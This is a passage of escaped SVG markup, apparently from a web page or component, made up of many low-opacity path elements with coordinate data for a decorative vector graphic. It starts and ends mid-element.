d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 